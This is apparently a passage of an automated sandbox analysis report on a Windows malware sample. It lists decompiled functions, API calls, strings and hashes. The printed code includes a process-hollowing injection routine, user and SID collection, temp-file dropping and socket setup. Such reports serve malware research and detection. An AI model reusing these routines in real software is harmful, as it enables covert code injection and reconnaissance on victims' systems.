						if(GetWindowsDirectoryA(0x412e08, 0x104) == 0 ||  *0x412e08 == 0) {
							E0040EF00(0x412e08, E00402544(0x4122f8, 0x410664, 0xb, 0xe4, 0xc8));
							E0040EE2A(_t23, 0x4122f8, 0, 0x100);
							_t34 = _t34 + 0x28;
						}
						E0040EF1E(0x412e08, E00402544(0x4122f8, 0x410658, 0xb, 0xe4, 0xc8));
						E0040EE2A(_t23, 0x4122f8, 0, 0x100);
					}
					L10:
					_t17 = 0x412e08;
					goto L11;
					L11:
					_t25 =  *_t17;
					_t17 =  &(_t17[1]);
					if(_t25 != 0) {
						goto L11;
					} else {
						_t18 = _t17 - 0x412e09;
						if( *((char*)(_t18 + 0x412e07)) != 0x5c) {
							 *((char*)(_t18 + 0x412e08)) = 0x5c;
							 *((char*)(_t18 + 0x412e09)) = _t25;
						}
						goto L14;
					}
				}
				_push(0x104);
				_push(0x412e08);
				if( *_t8() == 0 ||  *0x412e08 == 0) {
					goto L4;
				} else {
					goto L10;
				}
			}









                                                                                                                                  0x00406cc9
                                                                                                                                  0x00406cd6
                                                                                                                                  0x00406dbe
                                                                                                                                  0x00406dc1
                                                                                                                                  0x00406dc1
                                                                                                                                  0x00406cee
                                                                                                                                  0x00406cfb
                                                                                                                                  0x00406d12
                                                                                                                                  0x00406d1c
                                                                                                                                  0x00406d40
                                                                                                                                  0x00406d60
                                                                                                                                  0x00406d69
                                                                                                                                  0x00406d6e
                                                                                                                                  0x00406d6e
                                                                                                                                  0x00406d86
                                                                                                                                  0x00406d8f
                                                                                                                                  0x00406d98
                                                                                                                                  0x00406d99
                                                                                                                                  0x00406d99
                                                                                                                                  0x00406d9e
                                                                                                                                  0x00406d9f
                                                                                                                                  0x00406d9f
                                                                                                                                  0x00406da1
                                                                                                                                  0x00406da4
                                                                                                                                  0x00000000
                                                                                                                                  0x00406da6
                                                                                                                                  0x00406da6
                                                                                                                                  0x00406daf
                                                                                                                                  0x00406db1
                                                                                                                                  0x00406db8
                                                                                                                                  0x00406db8
                                                                                                                                  0x00000000
                                                                                                                                  0x00406daf
                                                                                                                                  0x00406da4
                                                                                                                                  0x00406cfd
                                                                                                                                  0x00406cfe
                                                                                                                                  0x00406d03
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000

                                                                                                                                  APIs
                                                                                                                                  • GetModuleHandleA.KERNEL32(kernel32,GetSystemWow64DirectoryA,PromptOnSecureDesktop,000000E4,00406DDC,000000C8), ref: 00406CE7
                                                                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 00406CEE
                                                                                                                                  • GetSystemDirectoryA.KERNEL32 ref: 00406D14
                                                                                                                                  • GetWindowsDirectoryA.KERNEL32(C:\Windows\SysWOW64\,00000104,?,00000000), ref: 00406D2B
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.279757756.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.279776907.0000000000414000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_OcmKX57vR7.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Directory$AddressHandleModuleProcSystemWindows
                                                                                                                                  • String ID: C:\Windows\SysWOW64\$GetSystemWow64DirectoryA$PromptOnSecureDesktop$kernel32
                                                                                                                                  • API String ID: 1082366364-2834986871
                                                                                                                                  • Opcode ID: bc03c77ada90e60c0bc9b65eb9809c5406ccea75b26a037b4d1e2b725433b91c
                                                                                                                                  • Instruction ID: 283af98db633f334a3c96cb566aa979ace8a56c3c0d7b64ee1e11c7fdc897f47
                                                                                                                                  • Opcode Fuzzy Hash: bc03c77ada90e60c0bc9b65eb9809c5406ccea75b26a037b4d1e2b725433b91c
                                                                                                                                  • Instruction Fuzzy Hash: AC21F26174034479F72157225D89FF72E4C8F52744F19407AF804B62D2CAED88E582AD
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 0040977C Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 82threadinjectionprocessCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  C-Code - Quality: 82%
                                                                                                                                  			E0040977C(void* __ecx, CHAR* _a4) {
				struct _PROCESS_INFORMATION _v20;
				void _v24;
				char _v28;
				struct _STARTUPINFOA _v96;
				struct _CONTEXT _v812;
				void* _t33;

				_t46 = __ecx;
				E0040EE2A(__ecx,  &_v96, 0, 0x44);
				_v96.cb = 0x44;
				if(CreateProcessA(0, _a4, 0, 0, 0, 4, 0, 0,  &_v96,  &_v20) != 0) {
					E0040EE2A(_t46,  &_v812, 0, 0x2cc);
					_v812.ContextFlags = 0x10002;
					if(GetThreadContext(_v20.hThread,  &_v812) != 0) {
						_t33 = E0040637C(_entry_, _v20.hProcess,  &_v28,  &_v24);
						_push(0);
						if(_t33 == 0) {
							L4:
							TerminateProcess(_v20.hProcess, ??);
							goto L1;
						}
						if(WriteProcessMemory(_v20, _v812.Ebx + 8,  &_v24, 4, ??) == 0) {
							goto L3;
						}
						_v812.Eax = _v28;
						if(SetThreadContext(_v20.hThread,  &_v812) == 0) {
							goto L3;
						}
						ResumeThread(_v20.hThread);
						return 1;
					}
					L3:
					_push(0);
					goto L4;
				}
				L1:
				return 0;
			}









                                                                                                                                  0x0040977c
                                                                                                                                  0x0040978f
                                                                                                                                  0x004097a9
                                                                                                                                  0x004097b9
                                                                                                                                  0x004097cf
                                                                                                                                  0x004097e1
                                                                                                                                  0x004097f3
                                                                                                                                  0x00409811
                                                                                                                                  0x00409819
                                                                                                                                  0x0040981c
                                                                                                                                  0x004097f6
                                                                                                                                  0x004097f9
                                                                                                                                  0x00000000
                                                                                                                                  0x004097f9
                                                                                                                                  0x00409839
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x0040983e
                                                                                                                                  0x00409856
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x0040985b
                                                                                                                                  0x00000000
                                                                                                                                  0x00409863
                                                                                                                                  0x004097f5
                                                                                                                                  0x004097f5
                                                                                                                                  0x00000000
                                                                                                                                  0x004097f5
                                                                                                                                  0x004097bb
                                                                                                                                  0x00000000

                                                                                                                                  APIs
                                                                                                                                  • CreateProcessA.KERNEL32(00000000,00409947,00000000,00000000,00000000,00000004,00000000,00000000,?,?,?,?,PromptOnSecureDesktop), ref: 004097B1
                                                                                                                                  • GetThreadContext.KERNEL32(?,?,?,?,?,?,?,PromptOnSecureDesktop), ref: 004097EB
                                                                                                                                  • TerminateProcess.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,PromptOnSecureDesktop), ref: 004097F9
                                                                                                                                  • WriteProcessMemory.KERNEL32(?,?,?,00000004,00000000,?,?,?,?,?,?,?,?,?,PromptOnSecureDesktop), ref: 00409831
                                                                                                                                  • SetThreadContext.KERNEL32(?,00010002,?,?,?,?,?,?,?,?,?,PromptOnSecureDesktop), ref: 0040984E
                                                                                                                                  • ResumeThread.KERNEL32(?,?,?,?,?,?,?,?,?,?,PromptOnSecureDesktop), ref: 0040985B
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.279757756.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.279776907.0000000000414000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_OcmKX57vR7.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ProcessThread$Context$CreateMemoryResumeTerminateWrite
                                                                                                                                  • String ID: D$PromptOnSecureDesktop
                                                                                                                                  • API String ID: 2981417381-1403908072
                                                                                                                                  • Opcode ID: 32bae011682959fb3fb7d6c44d279b6a6e60969011b3782382acaed110600071
                                                                                                                                  • Instruction ID: 6dc29e085b1385aad622296cf5a9b119a202239bcf48ce0aeeb22bf7d7f748db
                                                                                                                                  • Opcode Fuzzy Hash: 32bae011682959fb3fb7d6c44d279b6a6e60969011b3782382acaed110600071
                                                                                                                                  • Instruction Fuzzy Hash: 54216DB2901119BBDB119FA1DC49EEF7B7CEF05750F004071B909F2191EB759A44CAA8
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 0042D005 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 225COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.279779724.0000000000415000.00000020.00000001.01000000.00000003.sdmp, Offset: 00415000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_415000_OcmKX57vR7.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: _write_multi_char$_get_int_arg_wctomb_s_write_string
                                                                                                                                  • String ID: -
                                                                                                                                  • API String ID: 557302112-2547889144
                                                                                                                                  • Opcode ID: f99934b454a3d1bf400a84925ce5597834dedd02fc1dc8bff83ec1b1b6f9b803
                                                                                                                                  • Instruction ID: 77bf603594803d1c9b5e79f1d2728a729673d1f5d1a9e691231cf89a20a4aa33
                                                                                                                                  • Opcode Fuzzy Hash: f99934b454a3d1bf400a84925ce5597834dedd02fc1dc8bff83ec1b1b6f9b803
                                                                                                                                  • Instruction Fuzzy Hash: 14A17CB4E012288FDB24CF54DC89BEEB7B0AB48305F5481DAE4196B291D6789E80CF59
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 00AD6778 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 182COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • IsBadHugeReadPtr.KERNEL32(?,00000008), ref: 00AD67C3
                                                                                                                                  • htonl.WS2_32(?), ref: 00AD67DF
                                                                                                                                  • htonl.WS2_32(?), ref: 00AD67EE
                                                                                                                                  • GetCurrentProcess.KERNEL32(00000000,?,?,00000000,00000000,00000000,00000000), ref: 00AD68F1
                                                                                                                                  • ExitProcess.KERNEL32 ref: 00AD69BC
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.280127790.0000000000AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AD0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_ad0000_OcmKX57vR7.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Processhtonl$CurrentExitHugeRead
                                                                                                                                  • String ID: except_info$localcfg
                                                                                                                                  • API String ID: 1150517154-3605449297
                                                                                                                                  • Opcode ID: 9895dd2e79d38ff6447f40a868429f3d8bfef7524ed1ea596fca3f6cba339201
                                                                                                                                  • Instruction ID: 454a07fe417a680b141ffcf35172ba5a051b4b9b8253094d10fad74669932252
                                                                                                                                  • Opcode Fuzzy Hash: 9895dd2e79d38ff6447f40a868429f3d8bfef7524ed1ea596fca3f6cba339201
                                                                                                                                  • Instruction Fuzzy Hash: E6615E71A40208AFDB609FB4DC45FEA77F9FB08300F248066FA6DD2261EA7599948F54
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 00ADF57C Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 103networkCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • htons.WS2_32(00ADCC84), ref: 00ADF5B4
                                                                                                                                  • socket.WS2_32(00000002,00000001,00000000), ref: 00ADF5CE
                                                                                                                                  • closesocket.WS2_32(00000000), ref: 00ADF5DC
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.280127790.0000000000AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AD0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_ad0000_OcmKX57vR7.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: closesockethtonssocket
                                                                                                                                  • String ID: time_cfg
                                                                                                                                  • API String ID: 311057483-2401304539
                                                                                                                                  • Opcode ID: 35ab9fe366417f7a0644d99ffa926dabfa0554eb5add049d4f688aed03fde98e
                                                                                                                                  • Instruction ID: d930fd4c4deebc3e6ba21bbb9ba0e7c9142d49d4298de14f9563085b7e37c4c9
                                                                                                                                  • Opcode Fuzzy Hash: 35ab9fe366417f7a0644d99ffa926dabfa0554eb5add049d4f688aed03fde98e
                                                                                                                                  • Instruction Fuzzy Hash: 26315A76900118AFDB10DFA5DC89DEF7BBCEF89310F104566F91AE3250E7709A818BA4
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 00406F5F Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 89COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  C-Code - Quality: 93%
                                                                                                                                  			E00406F5F(long _a4, long _a8) {
				void* _v8;
				long _v12;
				union _SID_NAME_USE _v16;
				void _v84;
				char _v212;
				CHAR* _t36;
				void* _t53;
				intOrPtr* _t54;
				char _t62;
				void* _t65;
				char* _t66;
				intOrPtr _t67;
				CHAR* _t68;
				void* _t69;

				_t68 = _a4;
				 *_t68 = 0;
				if(GetUserNameA(_t68,  &_a8) == 0) {
					return 0;
				}
				_t36 = _t68;
				_t66 =  &(_t36[1]);
				do {
					_t62 =  *_t36;
					_t36 =  &(_t36[1]);
				} while (_t62 != 0);
				_a8 = _t36 - _t66;
				_a4 = 0x7c;
				_v12 = 0x80;
				if(LookupAccountNameA(0, _t68,  &_v84,  &_a4,  &_v212,  &_v12,  &_v16) == 0) {
					L8:
					_a8 = _a8 + wsprintfA( &(_t68[_a8]), "/%d", E00406EDD());
					return _a8;
				}
				E0040EF00( &(_t68[_a8]), "/");
				_a8 = _a8 + 1;
				_push( &_v8);
				_t53 =  &_v84;
				_push(_t53);
				L0040F4AA();
				if(_t53 == 0) {
					goto L8;
				}
				_t54 = _v8;
				_t20 = _t54 + 1; // 0x121
				_t65 = _t20;
				do {
					_t67 =  *_t54;
					_t54 = _t54 + 1;
				} while (_t67 != 0);
				_a4 = _t54 - _t65;
				E0040EE08( &(_t68[_a8]), _v8, _t54 - _t65 + 1);
				_a8 = _a8 + _a4;
				_t69 = _t69 + 0xc;
				LocalFree(_v8);
				goto L8;
			}

















                                                                                                                                  0x00406f6c
                                                                                                                                  0x00406f77
                                                                                                                                  0x00406f82
                                                                                                                                  0x00000000
                                                                                                                                  0x00407047
                                                                                                                                  0x00406f88
                                                                                                                                  0x00406f8a
                                                                                                                                  0x00406f8d
                                                                                                                                  0x00406f8d
                                                                                                                                  0x00406f8f
                                                                                                                                  0x00406f90
                                                                                                                                  0x00406f96
                                                                                                                                  0x00406fb3
                                                                                                                                  0x00406fba
                                                                                                                                  0x00406fc9
                                                                                                                                  0x00407025
                                                                                                                                  0x0040703f
                                                                                                                                  0x00000000
                                                                                                                                  0x00407042
                                                                                                                                  0x00406fd6
                                                                                                                                  0x00406fdb
                                                                                                                                  0x00406fe3
                                                                                                                                  0x00406fe4
                                                                                                                                  0x00406fe7
                                                                                                                                  0x00406fe8
                                                                                                                                  0x00406fef
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00406ff1
                                                                                                                                  0x00406ff4
                                                                                                                                  0x00406ff4
                                                                                                                                  0x00406ff7
                                                                                                                                  0x00406ff7
                                                                                                                                  0x00406ff9
                                                                                                                                  0x00406ffa
                                                                                                                                  0x00407000
                                                                                                                                  0x0040700e
                                                                                                                                  0x00407016
                                                                                                                                  0x00407019
                                                                                                                                  0x0040701f
                                                                                                                                  0x00000000

                                                                                                                                  APIs
                                                                                                                                  • GetUserNameA.ADVAPI32(?,0040D7C3), ref: 00406F7A
                                                                                                                                  • LookupAccountNameA.ADVAPI32(00000000,?,?,?,?,?,0040D7C3), ref: 00406FC1
                                                                                                                                  • ConvertSidToStringSidA.ADVAPI32(?,00000120), ref: 00406FE8
                                                                                                                                  • LocalFree.KERNEL32(00000120), ref: 0040701F
                                                                                                                                  • wsprintfA.USER32 ref: 00407036
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.279757756.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.279776907.0000000000414000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_OcmKX57vR7.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Name$AccountConvertFreeLocalLookupStringUserwsprintf
                                                                                                                                  • String ID: /%d$|
                                                                                                                                  • API String ID: 676856371-4124749705
                                                                                                                                  • Opcode ID: 473b18cc682185cad3921d3bacaa7dea67b37dc77049966f098f71850abf7020
                                                                                                                                  • Instruction ID: 25602f0bb6ce76eb5d01febd46d0227a680cec7408ef54ec30c82d1084126da1
                                                                                                                                  • Opcode Fuzzy Hash: 473b18cc682185cad3921d3bacaa7dea67b37dc77049966f098f71850abf7020
                                                                                                                                  • Instruction Fuzzy Hash: B5313C72900209BFDB01DFA5DC45BDB7BBCEF04314F048166F949EB241DA79EA588B98
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 00AD2F88 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 85memorylibrarystringCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • GetModuleHandleA.KERNEL32(?), ref: 00AD2FA1
                                                                                                                                  • LoadLibraryA.KERNEL32(?), ref: 00AD2FB1
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,004103F0), ref: 00AD2FC8
                                                                                                                                  • GetProcessHeap.KERNEL32(00000000,00000108), ref: 00AD3000
                                                                                                                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00AD3007
                                                                                                                                  • lstrcpyn.KERNEL32(00000008,?,000000FF), ref: 00AD3032
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.280127790.0000000000AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AD0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_ad0000_OcmKX57vR7.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Heap$AddressAllocateHandleLibraryLoadModuleProcProcesslstrcpyn
                                                                                                                                  • String ID: dnsapi.dll
                                                                                                                                  • API String ID: 1242400761-3175542204
                                                                                                                                  • Opcode ID: 7f5d185b3cfc49c95be658a26291c7e098e834ef0b89546cb75d65dd2dad2050
                                                                                                                                  • Instruction ID: 5814f2fadae54a750da6e115b6fc758d970e1c2295f68d553674450bceb83826
                                                                                                                                  • Opcode Fuzzy Hash: 7f5d185b3cfc49c95be658a26291c7e098e834ef0b89546cb75d65dd2dad2050
                                                                                                                                  • Instruction Fuzzy Hash: 1D217172901629BBCB219B55DC48AEFBBBCEF18B50F104422F906E7240D7B49E81C7E4
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 00406BA7 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 84COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  C-Code - Quality: 43%
                                                                                                                                  			E00406BA7(CHAR* _a4) {
				long _v8;
				long _v12;
				long _t14;
				int _t19;
				void* _t28;
				void* _t39;

				_push(_t30);
				if(IsBadCodePtr( *0x4130ac) == 0) {
					_push( &_v8);
					_push(0);
					if( *0x4130ac() == 0) {
						_t28 = E0040EBCC(_v8);
						if(_t28 == 0) {
							L7:
							_t14 = 0;
						} else {
							_push( &_v8);
							_push(_t28);
							if( *0x4130ac() == 0) {
								_v12 = 0;
								_t39 = CreateFileA(_a4, 0x40000000, 0, 0, 2, 0x80, 0);
								if(_t39 != 0xffffffff) {
									_t19 = WriteFile(_t39, _t28, _v8,  &_v12, 0);
									_push(_t39);
									if(_t19 != 0) {
										CloseHandle();
										E0040EC2E(_t28);
										_t14 = _v8;
									} else {
										CloseHandle();
										DeleteFileA(_a4);
										goto L9;
									}
								} else {
									L9:
									E0040EC2E(_t28);
									_t14 = 0;
								}
							} else {
								E0040EC2E(_t28);
								goto L7;
							}
						}
					} else {
						_t14 = 0;
					}
					return _t14;
				} else {
					return 0;
				}
			}









                                                                                                                                  0x00406bab
                                                                                                                                  0x00406bba
                                                                                                                                  0x00406bc4
                                                                                                                                  0x00406bc7
                                                                                                                                  0x00406bd2
                                                                                                                                  0x00406be4
                                                                                                                                  0x00406be9
                                                                                                                                  0x00406c03
                                                                                                                                  0x00406c03
                                                                                                                                  0x00406beb
                                                                                                                                  0x00406bee
                                                                                                                                  0x00406bef
                                                                                                                                  0x00406bfa
                                                                                                                                  0x00406c1a
                                                                                                                                  0x00406c23
                                                                                                                                  0x00406c28
                                                                                                                                  0x00406c3e
                                                                                                                                  0x00406c44
                                                                                                                                  0x00406c47
                                                                                                                                  0x00406c5a
                                                                                                                                  0x00406c61
                                                                                                                                  0x00406c66
                                                                                                                                  0x00406c49
                                                                                                                                  0x00406c49
                                                                                                                                  0x00406c52
                                                                                                                                  0x00000000
                                                                                                                                  0x00406c52
                                                                                                                                  0x00406c2a
                                                                                                                                  0x00406c2a
                                                                                                                                  0x00406c2b
                                                                                                                                  0x00406c30
                                                                                                                                  0x00406c30
                                                                                                                                  0x00406bfc
                                                                                                                                  0x00406bfd
                                                                                                                                  0x00000000
                                                                                                                                  0x00406c02
                                                                                                                                  0x00406bfa
                                                                                                                                  0x00406bd4
                                                                                                                                  0x00406bd4
                                                                                                                                  0x00406bd4
                                                                                                                                  0x00406c6e
                                                                                                                                  0x00406bbc
                                                                                                                                  0x00406bbf
                                                                                                                                  0x00406bbf

                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.279757756.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.279776907.0000000000414000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_OcmKX57vR7.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Code
                                                                                                                                  • String ID: PromptOnSecureDesktop
                                                                                                                                  • API String ID: 3609698214-2980165447
                                                                                                                                  • Opcode ID: 39c3a5a53f78f07926ecb9a894269625e93d17a87676cf1a9de91011702fa4cf
                                                                                                                                  • Instruction ID: deae59b9a6c18e17a8054c2740d34a6eafe128a66e3352cd220e92de8f8b68f4
                                                                                                                                  • Opcode Fuzzy Hash: 39c3a5a53f78f07926ecb9a894269625e93d17a87676cf1a9de91011702fa4cf
                                                                                                                                  • Instruction Fuzzy Hash: D7218B72208115FFEB10ABB1ED49EDF3EACDB08364B218436F543F1091EA799A50966C
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 00AD6F30 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 84libraryloaderCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • GetModuleHandleA.KERNEL32(00410380,00410670,00000000,\\.\pipe\uvfipga,00AD7043), ref: 00AD6F4E
                                                                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 00AD6F55
                                                                                                                                  • GetSystemDirectoryA.KERNEL32(C:\Windows\SysWOW64\,00000104), ref: 00AD6F7B
                                                                                                                                  • GetWindowsDirectoryA.KERNEL32(C:\Windows\SysWOW64\,00000104,?,00000000), ref: 00AD6F92
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.280127790.0000000000AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AD0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_ad0000_OcmKX57vR7.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Directory$AddressHandleModuleProcSystemWindows
                                                                                                                                  • String ID: C:\Windows\SysWOW64\$PromptOnSecureDesktop$\\.\pipe\uvfipga
                                                                                                                                  • API String ID: 1082366364-3838926563
                                                                                                                                  • Opcode ID: 04a770052eb57bbfbb30415af63bc188d31a19c33639d4dbddcadc0e825ea320
                                                                                                                                  • Instruction ID: bff54d1e5304d8336b9fee0506918f994986ae8e2ff8bc917dac8bf229071653
                                                                                                                                  • Opcode Fuzzy Hash: 04a770052eb57bbfbb30415af63bc188d31a19c33639d4dbddcadc0e825ea320
                                                                                                                                  • Instruction Fuzzy Hash: 002104217443407DF7225331AD89FFB3E5C8B66710F1880A6F506962C1EAD988D6826D
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 00409064 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 83filestringCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  C-Code - Quality: 63%
                                                                                                                                  			E00409064(void* __eflags, void* _a4, CHAR* _a8) {
				long _v8;
				char _v1032;
				signed int _t29;
				signed int _t62;
				void* _t64;

				GetTempPathA(0x400,  &_v1032);
				E00408274( &_v1032);
				_t29 = E0040ECA5();
				_t62 = 9;
				_push(_t29 % _t62);
				_push(E0040ECA5() % _t62);
				_push(E0040ECA5() % _t62);
				_push(E0040ECA5() % _t62);
				_push( &_v1032);
				wsprintfA(_a8, E00402544(0x4122f8, 0x410794, 0xf, 0xe4, 0xc8));
				E0040EE2A(_t62, 0x4122f8, 0, 0x100);
				_t64 = CreateFileA(_a8, 0x40000000, 0, 0, 2, 0, 0);
				if(_t64 <= 0) {
					return 0;
				}
				WriteFile(_t64, _a4, lstrlenA(_a4),  &_v8, 0);
				CloseHandle(_t64);
				return 1;
			}








                                                                                                                                  0x0040907b
                                                                                                                                  0x00409088
                                                                                                                                  0x0040908e
                                                                                                                                  0x00409095
                                                                                                                                  0x0040909c
                                                                                                                                  0x004090a8
                                                                                                                                  0x004090b4
                                                                                                                                  0x004090c9
                                                                                                                                  0x004090ca
                                                                                                                                  0x004090e9
                                                                                                                                  0x004090f8
                                                                                                                                  0x00409114
                                                                                                                                  0x00409118
                                                                                                                                  0x00000000
                                                                                                                                  0x0040913f
                                                                                                                                  0x0040912d
                                                                                                                                  0x00409134
                                                                                                                                  0x00000000

                                                                                                                                  APIs
                                                                                                                                  • GetTempPathA.KERNEL32(00000400,?,00000000,PromptOnSecureDesktop), ref: 0040907B
                                                                                                                                  • wsprintfA.USER32 ref: 004090E9
                                                                                                                                  • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000000,00000000), ref: 0040910E
                                                                                                                                  • lstrlenA.KERNEL32(00000000,00000100,00000000), ref: 00409122
                                                                                                                                  • WriteFile.KERNEL32(00000000,00000000,00000000), ref: 0040912D
                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 00409134
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.279757756.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.279776907.0000000000414000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_OcmKX57vR7.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: File$CloseCreateHandlePathTempWritelstrlenwsprintf
                                                                                                                                  • String ID: PromptOnSecureDesktop
                                                                                                                                  • API String ID: 2439722600-2980165447
                                                                                                                                  • Opcode ID: 428e34b473acadaeafd011e6997972491243de957368e91afa7baf983afb4ff9
                                                                                                                                  • Instruction ID: 58bbe077760212e8da181cf829ffda1a70542de1f4ba4b23f7e3a80b8f6fba70
                                                                                                                                  • Opcode Fuzzy Hash: 428e34b473acadaeafd011e6997972491243de957368e91afa7baf983afb4ff9
                                                                                                                                  • Instruction Fuzzy Hash: 451175B26401147AF7246723DD0AFEF3A6DDBC8704F04C47AB70AB50D1EAB94A519668
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 00AD92CB Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 83filestringCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • GetTempPathA.KERNEL32(00000400,?), ref: 00AD92E2
                                                                                                                                  • wsprintfA.USER32 ref: 00AD9350
                                                                                                                                  • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000000,00000000), ref: 00AD9375
                                                                                                                                  • lstrlen.KERNEL32(?,?,00000000), ref: 00AD9389
                                                                                                                                  • WriteFile.KERNEL32(00000000,?,00000000), ref: 00AD9394
                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 00AD939B
